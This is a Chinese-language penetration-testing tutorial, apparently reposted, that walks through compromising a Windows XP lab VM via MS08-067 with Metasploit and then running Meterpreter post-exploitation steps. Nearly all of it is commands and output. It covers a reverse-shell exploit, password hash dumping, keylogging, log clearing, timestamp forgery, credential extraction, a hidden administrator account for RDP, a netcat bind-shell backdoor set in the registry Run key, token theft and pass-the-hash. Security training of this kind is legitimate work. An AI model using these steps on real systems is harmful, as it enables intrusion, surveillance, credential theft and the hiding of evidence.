1200字范文 > 渗透测试-[Meterpreter后渗透25招]

渗透测试-[Meterpreter后渗透25招]

时间：2023-10-26 16:51:46

渗透测试-[后渗透25招]

0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(2) 键盘监听4.12 禁用目标系统的键盘或鼠标4.13 清除日志4.14 查找文件4.15 伪造时间戳(1)查看时间戳(2)将help.gif的时间戳复制给iisstart.asp4.16 目标系统网络信息搜集4.17 添加路由到目标主机并进行扫描(1)做arp扫描(2)做端口扫描4.18 mimikatz/kiwi抓取密码4.19 远程桌面(1)开启远程桌面并添加用户（1）连接RDP远程控制目标主机4.20 抓取目标主机的流量包4.21 通过操作注册表植入后门(1) 上传nc(2) 枚举run下的key(3) 设置键值(4) 查看键值(5) 访问后门4.22令牌操纵(1) 令牌假冒(2) 令牌窃取4.23 哈希利用(1) 获取哈希值(2)哈希传递4.24 后门植入(1) persistence启动项后门(2) metsvc服务后门25.重启/关机

本文基于ms08-067为例子，总结记录了常用的后渗透技巧,从简单的信息搜集到后门植入。

0.实验环境

网段：192.168.155.0/24

网卡模式：NAT

攻击机1-Kali-ip：192.168.155.2

攻击机2-mac-ip：192.168.155.1

靶机1winxpSP3英文版-ip：192.168.155.18

靶机2-win7-ip：192.168.155.19

1.MS08-067漏洞描述【RPC】

Microsoft Windows Server服务RPC请求缓冲区溢出漏洞。Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，SYSTEM权限执行任意指令。

对于Windows 2000、XP和Server ，无需认证便可以利用该漏洞；对于Windows Vista和Server ，可能需要认证。

/en-us/security-updates/securitybulletins//ms08-067 【官方描述】

2.主机发现

nmap -F 192.168.155.0/24

Starting Nmap 7.91 ( ) at -05-03 03:50 EDTNmap scan report for 192.168.155.1Host is up (0.00084s latency).Not shown: 97 closed portsPORTSTATE SERVICE53/tcp open domain5000/tcp open upnp49152/tcp open unknownMAC Address: FA:FF:C2:C2:93:64 (Unknown)Nmap scan report for 192.168.155.18Host is up (0.0018s latency).Not shown: 93 closed portsPORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)Nmap scan report for 192.168.155.2Host is up (0.0000060s latency).All 100 scanned ports on 192.168.155.2 are closedNmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds

目标主机IP：192.168.155.18

端口开放情况：

PORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)

目标端口：445

服务：microsoft-ds

3 利用MSF通过ms08-067漏洞渗透目标系统

msfconsolesearch ms08-067use msf6 > use exploit/windows/smb/ms08_067_netapishow targetsset target 0set RHOSTS 192.168.155.18set PAYLOAD windows/meterpreter/reverse_tcpexploit

exploit[*] Started reverse TCP handler on 192.168.155.2:4444[*] 192.168.155.18:445 - Automatically detecting the target...[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...[*] Sending stage (175174 bytes) to 192.168.155.18[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400

4.后渗透利用

4.1.系统信息搜集

信息收集的脚本位于，这里仅展示几个例子。

/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather

(1)获取系统基本信息

meterpreter > sysinfo

Computer : DH-CA8822AB9589OS : Windows XP (5.1 Build 2600, Service Pack 3).Architecture : x86System Language : en_USDomain: WORKGROUPLogged On Users : 2Meterpreter: x86/windows

如果目标是SP2系统，由于微软已不再维护，会存在一大堆漏洞。

(2)判断目标系统是否为虚拟机

meterpreter > run post/windows/gather/checkvm

[*] Checking if DH-CA8822AB9589 is a Virtual Machine ...[+] This is a VMware Virtual Machine

(3)磁盘分区情况

meterpreter > run post/windows/gather/forensics/enum_drives

Device Name:Type: Size (bytes):----------------- -------------<Physical Drives:>\\.\PhysicalDrive0 4702111234474983745<Logical Drives:>\\.\A: 4702111234474983745\\.\C: 4702111234474983745\\.\D: 4702111234474983745

(4)目标软件安装情况

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on DH-CA8822AB9589Installed Applications======================NameVersion-----------Adobe Reader 99.0.0KingView 6.53 6.53KingView Driver6.53Microsoft Office Standard Edition 11.0.8173.0Sentinel Protection Installer 7.5.07.5.0VMware Tools 8.1.4.11056WebFldrs XP 9.50.7523[+] Results stored in: /root/.msf4/loot/0505234757_default_192.168.155.18_host.application_805792.txt

(5)其他信息搜集

run post/windows/gather/dumplinks #获取最近的文件操作run post/linux/gather/checkvm #是否虚拟机run post/windows/gather/checkvm #是否虚拟机run post/windows/gather/enum_ie #获取IE缓存run post/windows/gather/enum_chrome #获取Chrome缓存run post/windows/gather/enum_patches #补丁信息run post/windows/gather/forensics/enum_drives #查看分区run post/windows/gather/enum_domain #查找域控run post/windows/gather/enum_applications #获取安装软件信息

4.2查看权限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

可以看到获得了system权限。

4.3 进入目标系统Shell

meterpreter > shell

成功进入目标系统的shell环境。

4.4 添加账号

C:\WINDOWS\system32>net user sxk /add

net user sxk /addThe command completed successfully.

4.5 将新账号添加到管理员组中

C:\WINDOWS\system32>net localgroup administrators sxk /add

net localgroup administrators sxk /addThe command completed successfully.

用户已经成功添加到目标系统的管理员组中。

4.6 截屏

meterpreter > screenshot

Screenshot saved to: /root/Desktop/YhioHCHD.jpeg

4.7 文件上传

meterpreter > upload /Users/sxk/MYSHXRuM.jpeg

[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg

pwd

C:\Windows\system32

在目标系统C盘中成功上传文件。

4.8 下载文件

meterpreter > download drivers/etc/hosts

[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts

成功下载到目标系统的hosts文件。

4.9 获取口令hash

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

破解哈希值：

259745cb123a52aa2e693aaacca2db52

31d6cfe0d16ae931b73c59d7e0c089c0

4.10 摄像头

meterpreter > webcam_list [查看摄像头][-] No webcams were foundmeterpreter > webcam_snap [通过摄像头拍照][-] Target does not have a webcammeterpreter > webcam_stream [通过摄像头拍摄视频][-] Target does not have a webcam

4.11 键盘监听

比如要对目标系统用户Administrator的键盘进行记录的话，就需要把进程迁移到Administrator的进程。在system权限下，是无法捕获Administrator的键盘记录。

keyscan_start开启键盘监听后，用keyscan_dump进行记录的导出，如果不想监听了才keyscan_stop。不是先keyscan_stop再keyscan_dump。

(1) ps找到合适的进程进行迁移

meterpreter>ps

3668 3608 explorer.exe 【常用的进程】

meterpreter > migrate 3668

[*] Migrating from 1048 to 3668...[*] Migration completed successfully.

meterpreter > getuid

Server username: client-PC\client

(2) 键盘监听

meterpreter > keyscan_start

Starting the keystroke sniffer ...

meterpreter > keyscan_dump

Dumping captured keystrokes...wo shi client ,<Shift>Ilove china<CR>

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

成功监听到了目标系统上的用户的键盘输入。“wo shi client ,Ilove china”

4.12 禁用目标系统的键盘或鼠标

uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标uictl disable keyboard #禁用键盘uictl disable mouse #禁用鼠标

4.13 清除日志

清除windows中的应用程序日志、系统日志、安全日志

clearav

4.14 查找文件

meterpreter > cd C:\\meterpreter > pwd

C:\

search -f *hosts*

4.15 伪造时间戳

meterpreter > pwd

C:\Inetpub\wwwroot

meterpreter > ls

Listing: C:\Inetpub\wwwroot===========================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 342 fil 2001-07-21 14:22:32 +0800 help.gif100666/rw-rw-rw- 1898 fil 2001-08-10 14:19:20 +0800 iisstart.asp100666/rw-rw-rw- 8923 fil 2001-08-10 14:19:20 +0800 localstart.asp100666/rw-rw-rw- 356 fil 2001-07-21 14:22:32 +0800 mmc.gif100666/rw-rw-rw- 2806 fil 2001-07-21 14:22:32 +0800 pagerror.gif100666/rw-rw-rw- 1046 fil 2001-07-21 14:22:32 +0800 print.gif100666/rw-rw-rw- 1577 fil 2001-07-21 14:22:32 +0800 warning.gif100666/rw-rw-rw- 1182 fil 2001-07-21 14:22:32 +0800 web.gif100666/rw-rw-rw- 11946 fil 2001-07-21 14:22:32 +0800 winxp.gif

(1)查看时间戳

meterpreter > timestomp -v help.gif

[*] Showing MACE attributes for help.gifModified: 2001-07-21 14:22:32 +0800Accessed: -09-28 11:40:15 +0800Created : -09-28 11:40:15 +0800Entry Modified: -09-28 11:40:28 +0800

meterpreter > timestomp -v iisstart.asp

[*] Showing MACE attributes for iisstart.aspModified: 2001-08-10 14:19:20 +0800Accessed: -09-28 11:40:15 +0800Created : -09-28 11:40:15 +0800Entry Modified: -09-28 11:40:28 +0800

(2)将help.gif的时间戳复制给iisstart.asp

可以看到iisstart.asp的时间戳被篡改了。

4.16 目标系统网络信息搜集

ipconfig/ifconfig [ip信息]netstat -ano [网络端口信息]arp[arp信息]getproxy [查看代理信息]route [路由信息]

4.17 添加路由到目标主机并进行扫描

(1)做arp扫描

(2)做端口扫描

4.18 mimikatz/kiwi抓取密码

meterpreter >creds_wdigest

[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================UsernameDomain Password-------------- --------DH-CA8822AB9589$ WORKGROUP (null)sxkDH-CA8822AB9589

成功获取到用户密码。

meterpreter > kiwi_cmd sekurlsa::logonPasswords

4.19 远程桌面

查看可用的桌面

enumdesktops

获取当前meterpreter 关联的桌面

meterpreter > getdesktop

Session 0\S\D

(1)开启远程桌面并添加用户

脚本位于

/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过enable_rdp.rb脚本可知：开启rdp是通过reg修改注册表；添加用户是调用cmd.exe 通过net user添加；端口转发是利用的portfwd命令

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop[*]RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*]The Terminal Services service is not set to auto, changing it to auto ...[*]Opening port in local firewall if necessary[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506025923_default_192.168.155.18_host.windows.cle_712463.txt

添加用户

run post/windows/manage/enable_rdp USERNAME=lyl PASSWORD=123456

[*] Enabling Remote Desktop[*]RDP is already enabled[*] Setting Terminal Services service startup mode[*]Terminal Services service is already set to auto[*]Opening port in local firewall if necessary[*] Setting user account for logon[*]Adding User: lyl with Password: 123456[*]Adding User: lyl to local group 'Remote Desktop Users'[*]Hiding user from Windows Login screen[*]Adding User: lyl to local group 'Administrators'[*] You can now login with the created user[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030102_default_192.168.155.18_host.windows.cle_669035.txt

设置端口转发

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

[*] Enabling Remote Desktop[*]RDP is already enabled[*] Setting Terminal Services service startup mode[*]Terminal Services service is already set to auto[*]Opening port in local firewall if necessary[*] Starting the port forwarding at local port 6662[*] Local TCP relay created: 0.0.0.0:6662 <-> 127.0.0.1:3389[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/0506030321_default_192.168.155.18_host.windows.cle_270181.txt

（1）连接RDP远程控制目标主机

rdesktop 127.0.0.1:6662

4.20 抓取目标主机的流量包

meterpreter > use sniffer

Loading extension sniffer...Success.

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1

[*] Capture started on interface 1 (50000 packet buffer)

meterpreter > sniffer_stats 1

[*] Capture statistics for interface 1packets: 18bytes: 1098

meterpreter > sniffer_dump 1 /tmp/msf-sniffer-test.pcap

[*] Flushing packet capture buffer for interface 1...[*] Flushed 139 packets (12986 bytes)[*] Downloaded 100% (12986/12986)...[*] Download completed, converting to PCAP...[*] PCAP file written to /tmp/msf-sniffer-test.pcap

meterpreter > sniffer_stop 1

[*] Capture stopped on interface 1[*] There are 12 packets (732 bytes) remaining[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

如图所示为抓到的目标主机的流量包。

4.21 通过操作注册表植入后门

(1) 上传nc

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

[*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32[*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe

(2) 枚举run下的key

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\runKeys (1):OptionalComponentsValues (4):VMware ToolsVMware User ProcessICQ LiteAdobe Reader Speed Launchermeterpreter >

(3) 设置键值

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successfully set msf_test_nc of REG_SZ.

(4) 查看键值

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v msf_test_nc

Key: HKLM\software\microsoft\windows\currentversion\runName: msf_test_ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe

(5) 访问后门

成功植入后门。

4.22令牌操纵

(1) 令牌假冒

meterpreter > use incognito

Loading extension incognito...Success.

meterpreter > help incognito

查看可用的token

meterpreter > list_tokens -u

假冒DH-CA8822AB9589\sxk token

impersonate_token 'DH-CA8822AB9589\sxk'

使用假冒的token执行cmd

execute -f cmd.exe -i –t

返回重新使用原始token

rev2self

meterpreter > getuidServer username: DH-CA8822AB9589\sxkmeterpreter > rev2selfmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM

(2) 令牌窃取

ps

从指定进程中窃取token

meterpreter > steal_token 1648

Stolen token with username: DH-CA8822AB9589\sxk

meterpreter > getuid

Server username: DH-CA8822AB9589\sxk

删除窃取的token

meterpreter > drop_token

Relinquished token, now running as: NT AUTHORITY\SYSTEM

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEMmeterpreter >

4.23 哈希利用

(1) 获取哈希值

从SAM导出密码哈希（需要system权限）

meterpreter > run post/windows/gather/smart_hashdump

(2)哈希传递

通过smart_hashdump获取用户哈希后，可以利用psexec模块进行哈希传递攻击。

前提条件：①开启445端口 smb服务；②开启admin$共享

利用过程如下。

msf > use exploit/windows/smb/psexecmsf > set payload windows/meterpreter/reverse_tcpmsf > set LHOST 192.168.155.2msf > set LPORT 4443msf > set RHOST 192.168.155.18msf >set SMBUser Administratormsf >set SMBPass aad3b4*****04ee:5b5f00*****c424cmsf >set SMBDomain WORKGROUP #域用户需要设置SMBDomainmsf >exploit